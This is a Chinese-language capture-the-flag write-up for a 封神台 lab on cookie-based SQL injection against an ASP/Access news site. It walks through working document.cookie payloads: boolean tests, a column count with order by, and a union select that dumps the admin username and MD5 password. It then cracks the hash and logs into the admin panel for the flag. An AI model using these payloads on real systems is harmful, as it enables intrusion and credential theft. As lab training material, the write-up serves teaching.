封神台-Access注入之Cookie注入

Access注入之Cookie注入

封神台-Access注入之Cookie注入

我们进入新闻页面,随便点击一条新闻进入

封神台-Access注入之Cookie注入

我们通过测试发现URL传参是有检测的,有WAF进行拦截,于是我们换一种思路,测试一下Cookie注入

我们通过测试Cookie传参id值

判断注入存在

设置Cookie:
document.cookie="id="+escape("171")

访问网址:
http://kypt8004.ia.aqlab.cn/shownews.asp

页面返回的是id=171的页面,可以证明id传参是有效的,可能存在Cookie注入

继续测试证明注入存在:
document.cookie="id="+escape("171 and 1=1") #页面正常
document.cookie="id="+escape("171 and 1=2") #页面异常

判断字段数

document.cookie="id="+escape("171 order by 10") #页面正常
document.cookie="id="+escape("171 order by 11") #页面异常

得出字段数为10

判断显错点

这里有一点需要注意的是Access数据库与MySQL数据库不同
  Access数据库进行查询时必须填写正确的表名才能查询
  
document.cookie="id="+escape("171 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin")

得出显错点为2,3位

查询数据

document.cookie="id="+escape("171 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin")

得出username=admin&password=b9a2a2b5dffb918c

我们注意到这个password是个md5值,于是我们去解密以下
得到密码为:welcome

于是我们去登陆网站后台

后台地址:http://kypt8004.ia.aqlab.cn/admin/Login.asp

登陆后得到最终flag为:zkz{welcome-control}

封神台-Access注入之Cookie注入

封神台-Access注入之Cookie注入

上一篇:sqlsever根据某个字段分组后获取到最新数据


下一篇:【转贴】Python处理海量数据的实战研究